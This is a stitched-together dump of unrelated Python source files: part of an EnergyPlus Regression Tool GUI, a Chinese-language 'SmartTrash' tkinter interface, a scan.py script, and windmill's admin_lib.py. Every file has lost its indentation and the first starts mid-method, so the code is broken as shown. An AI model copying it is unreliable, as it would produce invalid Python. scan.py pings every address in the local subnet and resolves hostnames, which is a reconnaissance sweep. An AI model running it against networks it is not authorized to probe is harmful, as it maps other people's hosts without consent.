url = 'https://energyplusregressiontool.readthedocs.io/en/latest/'
# noinspection PyBroadException
try:
webbrowser.open_new_tab(url)
except Exception:
# error message
messagebox.showerror("Docs problem", "Could not open documentation in browser")
@staticmethod
def about_dialog():
messagebox.showinfo("About", f"EnergyPlus Regression Tool\nVersion: {VERSION}")
def build_idf_listing(self, initialize=False, desired_selected_idfs: List[str] = None):
# if we don't have a specific list, then try to save any already selected ones first
if desired_selected_idfs:
desired_selected_idfs = set(desired_selected_idfs)
else:
desired_selected_idfs = set()
for this_file in self.active_idf_listbox.get(0, END):
desired_selected_idfs.add(this_file)
# clear any existing ones
self.active_idf_listbox.delete(0, END)
self.full_idf_listbox.delete(0, END)
# now rebuild them
self.valid_idfs_in_listing = False
path_1 = Path(self.build_dir_1_var.get())
path_2 = Path(self.build_dir_2_var.get())
if path_1.exists() and path_2.exists():
if not self.build_1:
status = self.try_to_set_build_1_to_dir(self.build_dir_1_var.get())
if not status:
self.full_idf_listbox.insert(END, "Cannot update master list master list")
self.full_idf_listbox.insert(END, "Build folder path #1 is invalid")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
return
if not self.build_2:
status = self.try_to_set_build_2_to_dir(self.build_dir_2_var.get())
if not status:
self.full_idf_listbox.insert(END, "Cannot update master list master list")
self.full_idf_listbox.insert(END, "Build folder path #2 is invalid")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
return
idf_dir_1 = self.build_1.get_idf_directory()
idfs_dir_1 = BaseBuildDirectoryStructure.get_idfs_in_dir(idf_dir_1)
idf_dir_2 = self.build_2.get_idf_directory()
idfs_dir_2 = BaseBuildDirectoryStructure.get_idfs_in_dir(idf_dir_2)
common_idfs = idfs_dir_1.intersection(idfs_dir_2)
if len(common_idfs) == 0:
self.full_idf_listbox.insert(END, "No common IDFs found between build folders")
self.full_idf_listbox.insert(END, "Select valid build folders to fill listing")
return
for idf in sorted(common_idfs):
self.full_idf_listbox.insert(END, str(idf))
self.valid_idfs_in_listing = True
elif initialize:
self.full_idf_listbox.insert(END, "This will be the master list")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
elif path_1.exists():
self.full_idf_listbox.insert(END, "Cannot update master list master list")
self.full_idf_listbox.insert(END, "Build folder path #2 is invalid")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
elif path_2.exists():
self.full_idf_listbox.insert(END, "Cannot update master list master list")
self.full_idf_listbox.insert(END, "Build folder path #1 is invalid")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
else:
self.full_idf_listbox.insert(END, "Cannot update master list master list")
self.full_idf_listbox.insert(END, "Both build folders are invalid")
self.full_idf_listbox.insert(END, "Select build folders to fill listing")
all_idfs_in_full_list = set(self.full_idf_listbox.get(0, END))
common_idfs = all_idfs_in_full_list.intersection(desired_selected_idfs)
for idf in sorted(common_idfs):
self.active_idf_listbox.insert(END, idf)
def build_results_tree(self, results: CompletedStructure = None):
self.results_tree.delete(*self.results_tree.get_children())
if not results:
return
root_and_files = {
ResultsTreeRoots.NumRun: results.all_files,
ResultsTreeRoots.Success1: results.success_case_a,
ResultsTreeRoots.NotSuccess1: results.failure_case_a,
ResultsTreeRoots.Success2: results.success_case_b,
ResultsTreeRoots.NotSuccess2: results.failure_case_b,
ResultsTreeRoots.FilesCompared: results.total_files_compared,
ResultsTreeRoots.BigMath: results.big_math_diffs,
ResultsTreeRoots.SmallMath: results.small_math_diffs,
ResultsTreeRoots.BigTable: results.big_table_diffs,
ResultsTreeRoots.SmallTable: results.small_table_diffs,
ResultsTreeRoots.Textual: results.text_diffs
}
for root, these_results in root_and_files.items():
num_items = sum([len(y) for _, y in these_results.descriptions.items()])
self.tree_folders[root] = self.results_tree.insert(
parent="", index=END, text=f"{root} ({num_items})", values=("", "")
)
for base_name, result_list in these_results.descriptions.items():
dir_1 = os.path.join(results.results_dir_a, base_name)
dir_2 = os.path.join(results.results_dir_b, base_name)
for result in result_list:
self.results_tree.insert(
parent=self.tree_folders[root], index=END, text=result,
values=(
"Double click to see base run results", "Double click to see mod run results", dir_1, dir_2
)
)
self.last_results = results
def add_to_log(self, message):
if self.log_message_listbox:
self.log_message_listbox.insert(END, f"[{datetime.now().strftime('%Y-%m-%d %H:%M:%S')}]: {message}")
self.log_message_listbox.yview(END)
if self.label_string:
self.label_string.set(message)
def clear_log(self):
self.log_message_listbox.delete(0, END)
def copy_log(self):
messages = self.log_message_listbox.get(0, END)
message_string = '\n'.join(messages)
self.root.clipboard_clear()
self.root.clipboard_append(message_string)
def client_idf_refresh(self):
self.build_idf_listing()
def idf_move_to_active(self, _=None):
if self.long_thread:
return
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
current_selection = self.full_idf_listbox.curselection()
if not current_selection:
simpledialog.messagebox.showerror("IDF Selection Error", "No IDF Selected")
return
currently_selected_idf = self.full_idf_listbox.get(current_selection)
try:
self.active_idf_listbox.get(0, END).index(currently_selected_idf)
simpledialog.messagebox.showwarning("IDF Selection Warning", "IDF already exists in active list")
return
except ValueError:
pass # the value error indicates it was _not_ found, so this is success
self.active_idf_listbox.insert(END, currently_selected_idf)
self.idf_refresh_count_status(currently_selected_idf, True)
def idf_remove_from_active(self, event=None):
if self.long_thread:
return
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
current_selection = self.active_idf_listbox.curselection()
if not current_selection:
if event:
return
simpledialog.messagebox.showerror("IDF Selection Error", "No IDF Selected")
return
self.active_idf_listbox.delete(current_selection)
self.idf_refresh_count_status(current_selection, False)
def idf_select_all(self):
self.idf_deselect_all()
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
all_idfs = self.full_idf_listbox.get(0, END)
for idf in all_idfs:
self.active_idf_listbox.insert(END, idf)
self.idf_refresh_count_status()
def idf_select_all_except_long_runs(self):
self.idf_deselect_all()
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
all_idfs = self.full_idf_listbox.get(0, END)
for idf in all_idfs:
skip_list = [
'LgOffVAVusingBasement.idf',
'HospitalLowEnergy.idf',
'SingleFamilyHouse_HP_Slab_Dehumidification.idf',
'SingleFamilyHouse_HP_Slab.idf'
]
if idf in skip_list:
continue
self.active_idf_listbox.insert(END, idf)
self.idf_refresh_count_status()
def idf_deselect_all(self):
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
self.active_idf_listbox.delete(0, END)
self.idf_refresh_count_status()
def idf_select_random(self):
if not self.valid_idfs_in_listing:
simpledialog.messagebox.showerror("IDF Selection Error", "Invalid build folders or IDF list")
return
potential_number_to_select = simpledialog.askinteger("Input Amount", "How many would you like to select?")
if not potential_number_to_select:
return
self.idf_deselect_all()
number_to_select = int(potential_number_to_select)
number_of_idf_files = self.full_idf_listbox.size()
if number_of_idf_files <= number_to_select: # just take all of them
self.idf_select_all()
else: # down select randomly
indices_to_take = random.sample(range(number_of_idf_files), number_to_select)
idfs_to_take = list()
for i in indices_to_take:
idf_to_get = self.full_idf_listbox.get(i)
idfs_to_take.append(idf_to_get)
for idf_to_get in sorted(idfs_to_take):
self.active_idf_listbox.insert(END, idf_to_get)
self.idf_refresh_count_status()
def idf_refresh_count_status(self, test_case=None, checked=False):
if not self.valid_idfs_in_listing:
return
num_total = self.full_idf_listbox.size()
num_active = self.active_idf_listbox.size()
if test_case:
chk_string = "Checked" if checked else "Unchecked"
if checked:
self.label_string.set(f"{chk_string} {test_case} ({num_active}/{num_total} selected)")
else:
self.label_string.set(f"{num_active}/{num_total} selected")
def set_gui_status_for_run(self, is_running: bool):
if is_running:
run_button_state = 'disabled'
stop_button_state = 'normal'
else:
run_button_state = 'normal'
stop_button_state = 'disabled'
self.build_dir_1_button.configure(state=run_button_state)
self.build_dir_2_button.configure(state=run_button_state)
self.run_button.configure(state=run_button_state)
self.idf_select_all_button.configure(state=run_button_state)
self.idf_deselect_all_button.configure(state=run_button_state)
self.idf_select_n_random_button.configure(state=run_button_state)
self.move_idf_to_active_button.configure(state=run_button_state)
self.remove_idf_from_active_button.configure(state=run_button_state)
self.run_period_option_menu.configure(state=run_button_state)
self.reporting_frequency_option_menu.configure(state=run_button_state)
self.num_threads_spinner.configure(state=run_button_state)
self.stop_button.configure(state=stop_button_state)
def try_to_set_build_1_to_dir(self, selected_dir) -> bool:
probable_build_dir_type = autodetect_build_dir_type(selected_dir)
if probable_build_dir_type == KnownBuildTypes.Unknown:
self.add_to_log("Could not detect build 1 type")
return False
elif probable_build_dir_type == KnownBuildTypes.Installation:
self.add_to_log("Build 1 type detected as an EnergyPlus Install")
self.build_1 = EPlusInstallDirectory()
self.build_1.set_build_directory(selected_dir)
elif probable_build_dir_type == KnownBuildTypes.VisualStudio:
self.add_to_log("Build 1 type detected as a Visual Studio build")
self.build_1 = CMakeCacheVisualStudioBuildDirectory()
self.build_1.set_build_directory(selected_dir)
elif probable_build_dir_type == KnownBuildTypes.Makefile:
self.add_to_log("Build 1 type detected as a Makefile-style build")
self.build_1 = CMakeCacheMakeFileBuildDirectory()
self.build_1.set_build_directory(selected_dir)
return True
def client_build_dir_1(self):
selected_dir = filedialog.askdirectory()
if not selected_dir:
return
if not os.path.exists(selected_dir):
return
status = self.try_to_set_build_1_to_dir(selected_dir)
if not status:
simpledialog.messagebox.showerror(
"Build folder problem", f"Could not determine build type for build 1: {selected_dir}!"
)
return
self.build_dir_1_var.set(selected_dir)
self.build_idf_listing()
def try_to_set_build_2_to_dir(self, selected_dir) -> bool:
probable_build_dir_type = autodetect_build_dir_type(selected_dir)
if probable_build_dir_type == KnownBuildTypes.Unknown:
self.add_to_log("Could not detect build 2 type")
return False
elif probable_build_dir_type == KnownBuildTypes.Installation:
self.add_to_log("Build 2 type detected as an EnergyPlus Install")
self.build_2 = EPlusInstallDirectory()
self.build_2.set_build_directory(selected_dir)
elif probable_build_dir_type == KnownBuildTypes.VisualStudio:
self.add_to_log("Build 2 type detected as a Visual Studio build")
self.build_2 = CMakeCacheVisualStudioBuildDirectory()
self.build_2.set_build_directory(selected_dir)
elif probable_build_dir_type == KnownBuildTypes.Makefile:
self.add_to_log("Build 2 type detected as a Makefile-style build")
self.build_2 = CMakeCacheMakeFileBuildDirectory()
self.build_2.set_build_directory(selected_dir)
return True
def client_build_dir_2(self):
selected_dir = filedialog.askdirectory()
if not selected_dir:
return
if not os.path.exists(selected_dir):
return
status = self.try_to_set_build_2_to_dir(selected_dir)
if not status:
simpledialog.messagebox.showerror("Could not determine build type for build 2!")
return
self.build_dir_2_var.set(selected_dir)
self.build_idf_listing()
def client_run(self):
if self.long_thread:
messagebox.showerror("Cannot run another thread, wait for the current to finish -- how'd you get here?!?")
return
potential_num_threads = self.num_threads_var.get()
try:
num_threads = int(potential_num_threads)
except ValueError:
messagebox.showerror("Invalid Configuration", "Number of threads must be an integer")
return
if not self.build_1:
messagebox.showerror("Build folder 1 problem", "Select a valid build folder 1 prior to running")
return
build_1_valid = self.build_1.verify()
build_1_problem_files = [b[1] for b in build_1_valid if not b[2]]
if len(build_1_problem_files):
missing_files = '\n'.join(build_1_problem_files)
messagebox.showerror("Build folder 1 problem", f"Missing files:\n{missing_files}")
return
if not self.build_2:
messagebox.showerror("Build folder 2 problem", "Select a valid build folder 2 prior to running")
return
build_2_valid = self.build_2.verify()
build_2_problem_files = [b[1] for b in build_2_valid if not b[2]]
if len(build_2_problem_files):
missing_files = '\n'.join(build_2_problem_files)
messagebox.showerror("Build folder 2 problem", f"Missing files:\n{missing_files}")
return
run_configuration = TestRunConfiguration(
force_run_type=self.run_period_option.get(),
num_threads=num_threads,
report_freq=self.reporting_frequency.get(),
build_a=self.build_1,
build_b=self.build_2
)
idfs_to_run = list()
for this_file in self.active_idf_listbox.get(0, END):
# using build 1 as the basis for getting a weather file # TODO: Allow different EPWs for build 1, 2
potential_epw = get_epw_for_idf(self.build_1.source_directory, this_file)
idfs_to_run.append(
TestEntry(this_file, potential_epw)
)
if len(idfs_to_run) == 0:
messagebox.showwarning("Nothing to run", "No IDFs were activated, so nothing to run")
return
self.background_operator = SuiteRunner(run_configuration, idfs_to_run)
self.background_operator.add_callbacks(print_callback=MyApp.print_listener,
simstarting_callback=MyApp.starting_listener,
casecompleted_callback=MyApp.case_completed_listener,
simulationscomplete_callback=MyApp.runs_complete_listener,
diffcompleted_callback=MyApp.diff_complete_listener,
alldone_callback=MyApp.done_listener,
cancel_callback=MyApp.cancelled_listener)
self.set_gui_status_for_run(True)
self.long_thread = Thread(target=self.background_operator.run_test_suite)
self.long_thread.setDaemon(True)
self.add_to_log("Starting a new set of tests")
self.long_thread.start()
@staticmethod
def print_listener(msg):
pub.sendMessage(PubSubMessageTypes.PRINT, msg=msg)
def print_handler(self, msg):
self.add_to_log(msg)
@staticmethod
def starting_listener(number_of_cases_per_build):
pub.sendMessage(
PubSubMessageTypes.STARTING,
number_of_cases_per_build=number_of_cases_per_build
)
def starting_handler(self, number_of_cases_per_build):
self.progress['maximum'] = 3 * number_of_cases_per_build
self.progress['value'] = 0
@staticmethod
def case_completed_listener(test_case_completed_instance):
pub.sendMessage(PubSubMessageTypes.CASE_COMPLETE, test_case_completed_instance=test_case_completed_instance)
def case_completed_handler(self, test_case_completed_instance):
self.progress['value'] += 1
if test_case_completed_instance.run_success:
message = "Completed %s : %s, Success" % (
test_case_completed_instance.run_directory, test_case_completed_instance.case_name)
self.add_to_log(message)
else:
message = "Completed %s : %s, Failed" % (
test_case_completed_instance.run_directory, test_case_completed_instance.case_name)
self.add_to_log(message)
@staticmethod
def runs_complete_listener():
pub.sendMessage(PubSubMessageTypes.SIMULATIONS_DONE)
def runs_complete_handler(self):
self.add_to_log("Simulation runs complete")
@staticmethod
def diff_complete_listener():
pub.sendMessage(PubSubMessageTypes.DIFF_COMPLETE)
def diff_complete_handler(self):
self.progress['value'] += 1
@staticmethod
def done_listener(results):
pub.sendMessage(PubSubMessageTypes.ALL_DONE, results=results)
def done_handler(self, results: CompletedStructure):
self.add_to_log("All done, finished")
self.label_string.set("Hey, all done!")
if system() == 'Linux':
subprocess.call(['notify-send', 'EnergyPlus Regression Tool', 'Regressions Finished'])
elif system() == 'Darwin':
subprocess.call([
'osascript',
'-e',
'display notification "Regressions Finished" with title "EnergyPlus Regression Tool"'
])
self.build_results_tree(results)
self.client_done()
@staticmethod
def cancelled_listener():
pub.sendMessage(PubSubMessageTypes.CANCELLED)
def cancelled_handler(self):
self.add_to_log("Cancelled!")
self.label_string.set("Properly cancelled!")
self.client_done()
def client_stop(self):
self.add_to_log("Attempting to cancel")
self.label_string.set("Attempting to cancel...")
self.background_operator.interrupt_please()
def client_exit(self):
if self.long_thread:
messagebox.showerror("Uh oh!", "Cannot exit program while operations are running; abort them then exit")
return
sys.exit()
def client_done(self):
self.set_gui_status_for_run(False)
self.long_thread = None
|
ui.py
|
import tkinter as tk
import main
import image
import hardware
import threading,json,time
typelist = ['可回收', '有害', '厨余(湿)', '其他(干)']
def startui():
serverThread = threading.Thread(target=start)
serverThread.start()
window = None
l = None
b1 = None
sleeptime=10
def ontake(path):
if window == None:
init()
def updateui():
global w2
global name
w2 = tk.Tk()
w2.title('SmartTrash')
w2.geometry('1280x720')
l = tk.Label(w2,text='您觉得[%s]应该是什么垃圾'%(name), bg='white', fg='black', font=('Arial', 24), width=40, height=4).pack()
for i in range(4):
tk.Button(w2, text=typelist[i]+'垃圾', font=('Arial', 24), width=20, height=2, command=lambda arg2=i,arg1=name:updatetype(arg1,arg2)).pack()
w2.mainloop()
def historyui():
global history
history.delete(0,history.size()-1)
history.insert("end", '垃圾投入历史记录')
result=json.loads(image.getHistory())
for item in result:
oneresult='垃圾名:%s 类型:%s 投入时间:%s'%(item[1],typelist[int(item[2])],item[3])
history.insert("end", oneresult)
def updatetype(name,ttype):
global trashtype
image.updatetype(name,ttype)
print('ui.updatetype:name=%s type=%s'%(name,ttype))
if main.usemulti:
image.addHistory(name,trashtype)
historyui()
w2.destroy()
if trashtype.find('无分类')!=-1:
hardware.run(ttype)
trashtype='已提交错误'
def selectname(num):
global selectnum
global resttime
selectnum=num
resttime=0
print("ui.selectname.num="+str(num))
def run():
global l
global name
global trashtype
global window
l.config(text='拍摄照片中')
image.take()
l.config(text='识别物品中')
name = image.image_classify(image.image)['result'][0]['keyword']
l.config(text='您识别的垃圾是[%s]\n获取分类中' % (name))
trashtype = image.getType(
image.result['result'][0]['keyword']+'/'+image.result['result'][0]['root'])
if trashtype.find('无分类')==-1:
l.config(text='您识别的垃圾是[%s]\n您识别的垃圾属于[%s]' % (name, trashtype))
wrong.config(state='normal')
hardware.run(trashtype)
else:
l.config(text='这是[%s]\n%s' % (name, trashtype))
wrong.config(state='normal')
historyui()
def run_multi():
global l
global name
global trashtype
global window
global selectbtn
global selectnum
global resttime
wrong.config(state='disabled')
l.config(text='拍摄照片中')
image.take()
l.config(text='识别物品中')
ic=image.image_classify(image.image)
if str(ic).find('err')!=-1:
l.config(text='物品识别错误')
print(str(ic))
return
ic=json.loads(json.dumps(ic).replace('/',','))
namelist=[]
for i in range(ic['result_num']):
namelist.append(ic['result'][i]['keyword'])
print('ui.run_multi.namelist:'+str(namelist))
finalname=[]
for i in range(4):
if i==0 or ic['result'][i]['score']>=0.05:
finalname.append(namelist[i])
selectbtn[i].config(state='disabled',text='这是[%s]\n获取分类中' % (namelist[i]))
else:
selectbtn[i].config(state='disabled',text='')
print('ui.run_multi.finalname:'+str(finalname))
typelist=json.loads(image.getType_multi(finalname))
print('ui.run_multi.typelist:'+str(typelist))
for i in range(len(typelist)):
if typelist[i].find('无分类')==-1:
selectbtn[i].config(state='normal',text='这是[%s]\n属于[%s]' % (finalname[i], typelist[i]))
else:
selectbtn[i].config(state='normal',text='这是[%s]\n%s' % (finalname[i], '暂无分类结果'))
selectnum=0
resttime=sleeptime
l.config(text='请选出相对正确的结果\n%s秒后默认选择第一个结果'%(str(sleeptime)))
while resttime>0:
time.sleep(0.1)
resttime=resttime-0.1
#wrong.config(state='normal')
for i in range(4):
selectbtn[i].config(text='',state='disabled')
name=finalname[selectnum]
trashtype=typelist[selectnum]
if trashtype.find('无分类')==-1:
l.config(text='您识别的垃圾是[%s]\n您识别的垃圾属于[%s]' % (name, trashtype))
wrong.config(state='normal')
hardware.run(trashtype)
image.addHistory(name,trashtype)
historyui()
else:
l.config(text='这是[%s]\n%s' % (name, trashtype))
wrong.config(state='normal')
#hardware.run(trashtype)
def start():
global window
global l
global wrong
global b1
global history
global selectbtn
window = tk.Tk()
window.title('SmartTrash')
window.geometry('1280x720')
var = tk.StringVar()
# b1.destroy()
l = tk.Label(window, bg='white', fg='black', font=('Arial', 24), width=60, height=4)
l.pack()
if main.usemulti:
fm=tk.Frame(window)
selectbtn=[]
for i in range(4):
selectbtn.append(tk.Button(fm, text='', font=('Arial', 24), width=15, height=2, command=lambda arg=i:selectname(arg),state='disabled'))
selectbtn[i].pack(side='left')
fm.pack()
else:
take = tk.Button(window, text='拍摄并识别', font=('Arial', 24), width=20, height=2, command=run)
take.pack()
if main.usedist:
take.config(text='自动识别已开启')
take.config(state='disabled')
wrong = tk.Button(window, text='觉得分类有问题?点击提交错误', font=('Arial', 24), width=25, height=2, command=updateui,state='disabled')
wrong.pack()
if main.uihistory:
fmh=tk.Frame(window)
history = tk.Listbox(window,font=('Arial', 24),width=60,height=10)
history.pack()
#sb = tk.Scrollbar(fmh,command=history.yview)
#sb.pack(side='right',fill='y')
#history.config(yscrollcommand=sb.set)
history.insert("end", '垃圾投入历史记录')
historyui()
window.mainloop()
if __name__ == '__main__':
start()
|
scan.py
|
import os
import socket
import multiprocessing
import subprocess
import os
def pinger(job_q, results_q):
DEVNULL = open(os.devnull, 'w')
while True:
ip = job_q.get()
if ip is None:
break
try:
subprocess.check_call(['ping', '-c1', ip],
stdout=DEVNULL)
results_q.put(ip)
except:
pass
def get_my_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
s.close()
return ip
def map_network(pool_size=255):
ip_list = list()
ip_failed = list()
ip_parts = get_my_ip().split('.')
base_ip = ip_parts[0] + '.' + ip_parts[1] + '.' + ip_parts[2] + '.'
jobs = multiprocessing.Queue()
results = multiprocessing.Queue()
pool = [multiprocessing.Process(target=pinger, args=(jobs, results)) for i in range(pool_size)]
for p in pool:
p.start()
for i in range(1, 255):
jobs.put(base_ip + '{0}'.format(i))
for p in pool:
jobs.put(None)
for p in pool:
p.join()
print('\n ----------------------------RESULTS-------------------------------')
while not results.empty():
ip = results.get()
ip_list.append(ip)
try:
print(socket.gethostbyaddr(ip))
except:
ip_failed.append(ip)
print('\n ---------------------------UNKNOWN IP--------------------------------')
for i in ip_failed:
print(i)
return ip_list
def main():
print('Scanning...')
lst = map_network()
if __name__ == '__main__':
main()
|
admin_lib.py
|
# Copyright (c) 2006-2007 Open Source Applications Foundation
# Copyright (c) 2008-2009 Mikeal Rogers <mikeal.rogers@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import windmill
import logging
from time import sleep
import os, sys
from datetime import datetime
from threading import Thread
import shutil
import socket
from windmill.dep import functest
functest.configure()
def process_options(argv_list):
"""Process all the command line options"""
import admin_options
admin_options.process_module(admin_options)
argv_list.pop(0)
action = None
# This might be the hairiest code in windmill :)
# We have a very specific way we need to parse arguments
# because of the way different arguments interact with each other
# 8/27/2007 Gawd this is ugly, i would love to refactor this but I've
# forgotten what it does -Mikeal
# 12/15/2007 Oh man, I'm going to add a feature to this without refactoring it.
# The issue with this code remains the same and no standard arg parsing
# module can do what we need.
for arg in argv_list:
# Grab the test url if one is given
if arg.startswith('http://') or arg.startswith('https://'):
windmill.settings['TEST_URL'] = arg
functest.registry['url'] = arg
elif arg.startswith('-'):
# Take something like -efg and set the e, f, and g options
options = arg.replace('-', '')
for option in options:
admin_options.flags_dict[option]()
else:
# Any argument not starting with - is a regular named option
value = None
if arg.find('=') is not -1:
name, value = arg.split('=')
else:
name = arg
if name in admin_options.options_dict:
processor = admin_options.options_dict[name]
if value is None:
processor()
else:
processor(value)
elif name in action_mapping:
action = action_mapping[name]
else:
print name, 'is not a windmill argument. Sticking in functest registry.'
if value is None:
value = True
functest.registry[name] = value
if action is None:
# If an action is not defined we default to running the service in the foreground
return action_mapping['runserver']
else:
return action
def setup_servers(console_level=logging.INFO):
"""Setup the server and return httpd and loggers"""
windmill.is_active = True
windmill.ide_is_awake = False
if len(logging.getLogger().handlers) > 0:
console_handler = logging.getLogger().handlers[0]
console_handler.setLevel(console_level)
httpd = windmill.server.wsgi.make_windmill_server()
return httpd
def run_threaded(console_level=logging.INFO):
"""Run the server threaded."""
httpd = setup_servers(console_level)
httpd_thread = Thread(target=httpd.start)
getattr(httpd_thread, 'setDaemon', lambda x: x)(True)
httpd_thread.start()
while not httpd.ready:
sleep(.25)
return httpd, httpd_thread
def configure_global_settings(logging_on=True):
"""Configure that global settings for the current run"""
# This logging stuff probably shouldn't be here, it should probably be abstracted
if logging_on:
logging.getLogger().setLevel(0)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
console.setFormatter(formatter)
logging.getLogger().addHandler(console)
if os.environ.has_key('WINDMILL_CONFIG_FILE'):
local_settings = os.environ['WINDMILL_CONFIG_FILE']
else:
local_settings = None
windmill.settings = windmill.conf.configure_settings(localSettings=local_settings)
port = windmill.settings['SERVER_HTTP_PORT']
while 1:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', port))
s.close()
port += 1
except socket.error:
break
windmill.settings['SERVER_HTTP_PORT'] = port
return windmill.settings
on_ide_awake = []
def setup():
"""Setup server and shell objects"""
global shell_objects_dict
shell_objects_dict = {}
windmill.settings['shell_objects'] = shell_objects_dict
assert not windmill.settings.get('setup_has_run', False)
httpd, httpd_thread = run_threaded(windmill.settings['CONSOLE_LOG_LEVEL'])
shell_objects_dict['httpd'] = httpd
shell_objects_dict['httpd_thread'] = httpd_thread
from windmill.bin import shell_objects
if windmill.settings['CONTINUE_ON_FAILURE'] is not False:
shell_objects.jsonrpc_client.add_json_command('{"method": "commands.setOptions", "params": {"stopOnFailure" : false}}')
if windmill.settings['EXTENSIONS_DIR'] is not None:
shell_objects.load_extensions_dir(windmill.settings['EXTENSIONS_DIR'])
if windmill.settings['RUN_TEST'] is not None:
shell_objects.run_test(windmill.settings['RUN_TEST'])
if windmill.settings['LOAD_TEST'] is not None:
shell_objects.load_test(windmill.settings['LOAD_TEST'])
if windmill.settings['JAVASCRIPT_TEST_DIR']:
shell_objects.run_js_tests(windmill.settings['JAVASCRIPT_TEST_DIR'],
windmill.settings['JAVASCRIPT_TEST_FILTER'],
windmill.settings['JAVASCRIPT_TEST_PHASE'])
browser = [setting for setting in windmill.settings.keys() if setting.startswith('START_') and \
windmill.settings[setting] is True]
import shell_objects
if len(browser) is 1:
shell_objects_dict['browser'] = getattr(shell_objects, browser[0].lower())()
for attribute in dir(shell_objects):
shell_objects_dict[attribute] = getattr(shell_objects, attribute)
shell_objects_dict['setup_has_run'] = True
return shell_objects_dict
def teardown(shell_objects):
"""Teardown the server, threads, and open browsers."""
if windmill.is_active:
windmill.is_active = False
shell_objects['clear_queue']()
for controller in windmill.settings['controllers']:
controller.stop()
del(controller)
if windmill.settings['START_FIREFOX'] and windmill.settings['MOZILLA_CREATE_NEW_PROFILE']:
shutil.rmtree(windmill.settings['MOZILLA_PROFILE'])
for directory in windmill.teardown_directories:
if os.path.isdir(directory):
shutil.rmtree(directory)
# while shell_objects['httpd_thread'].isAlive():
# try:
# shell_objects['httpd'].stop()
# except Exception, e:
# print "Exception occurred while shutting server down:"
# print e
#
# # Hacking workaround for port locking up on linux.
# if sys.platform == 'linux2':
# try:
# shell_objects['httpd'].socket.shutdown(socket.SHUT_RDWR)
# shell_objects['httpd'].socket.close()
# except: pass
shell_objects['httpd'].stop()
#shell_objects['httpd_thread'].join()
def runserver_action(shell_objects):
"""Run the server in the foreground with the options given to the command line"""
try:
if 'runserver' in sys.argv or len(windmill.settings['controllers']) is 0:
print 'Server running...'
if windmill.settings['EXIT_ON_DONE'] and not windmill.settings['JAVASCRIPT_TEST_DIR']:
while windmill.block_exit or (
len(shell_objects['httpd'].controller_queue.queue) is not 0 ) or (
len(shell_objects['httpd'].test_resolution_suite.unresolved) is not 0 ):
sleep(.25)
elif ( windmill.settings['RUN_TEST'] ):
windmill.runserver_running = True
while windmill.runserver_running:
sleep(.25)
else:
windmill.runserver_running = True
while windmill.runserver_running:
sleep(.25)
teardown(shell_objects)
if windmill.test_has_failed:
sys.exit(1)
except KeyboardInterrupt:
teardown(shell_objects)
sys.exit(1)
def shell_action(shell_objects):
"""Start the windmill shell environment"""
windmill.in_shell = True
# If ipython is installed and we weren't given the usecode option
try:
assert not windmill.settings['USECODE']
from IPython.Shell import IPShellEmbed
ipshell = IPShellEmbed()
ipshell(local_ns=shell_objects)
except:
import code
code.interact(local=shell_objects)
teardown(shell_objects)
# def wxui_action(shell_objects):
# """Start the wxPython based service GUI"""
# try:
# import wxui
# app = wxui.App(shell_objects)
# shell_objects['wxui_app'] = app
# app.MainLoop()
# teardown(shell_objects)
# except ImportError:
# print 'Failed to import wx, defaulting to the shell'
# shell_action(shell_objects)
# def tinderbox_action(shell_objects):
# """Tinderbox action for continuous integration"""
# shell_objects['jsonrpc_client'].add_json_command('{"method": "commands.setOptions", "params": {"stopOnFailure" : false}}')
#
# class ResultsProcessor(object):
# passed = 0
# failed = 0
# def success(self, test, debug):
# self.passed += 1
# def failure(self, test, debug):
# self.failed += 1
#
# result_processor = ResultsProcessor()
# shell_objects['httpd'].test_resolution_suite.result_processor = result_processor
#
# starttime = datetime.now()
# result = None
#
# if windmill.settings['RUN_TEST']:
# try:
# while ( len(shell_objects['httpd'].controller_queue.queue) is not 0 ) or (
# len(shell_objects['httpd'].test_resolution_suite.unresolved) is not 0 ):
# sleep(1)
#
# print '#TINDERBOX# Testname = FullSuite'
# print '#TINDERBOX# Time elapsed = %s' % str (datetime.now() - starttime)
#
# if result_processor.failed > 0 or result_processor.passed is 0:
# result = "FAILED"
# else:
# result = "PASSED"
#
# print '#TINDERBOX# Status = %s' % result
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
#
# except KeyboardInterrupt:
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
# else:
# try:
# while not windmill.TESTS_COMPLETED:
# sleep(1)
# except KeyboardInterrupt:
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
#
# print '#TINDERBOX# Testname = FullSuite'
# print '#TINDERBOX# Time elapsed = %s' % str (datetime.now() - starttime)
# if windmill.RESULTS['fail'] > 0 or windmill.RESULTS['pass'] is 0:
# result = "FAILED"
# else:
# result = "PASSED"
#
# print '#TINDERBOX# Status = %s' % result
# teardown(shell_objects)
# if result == "FAILED":
# sys.exit(1)
def start_windmill():
"""Start windmill and return shell_objects"""
configure_global_settings()
shell_objects = setup()
return shell_objects
def command_line_startup():
"""Command line startup"""
windmill.stdout, windmill.stdin = sys.stdout, sys.stdin
configure_global_settings()
action = process_options(sys.argv)
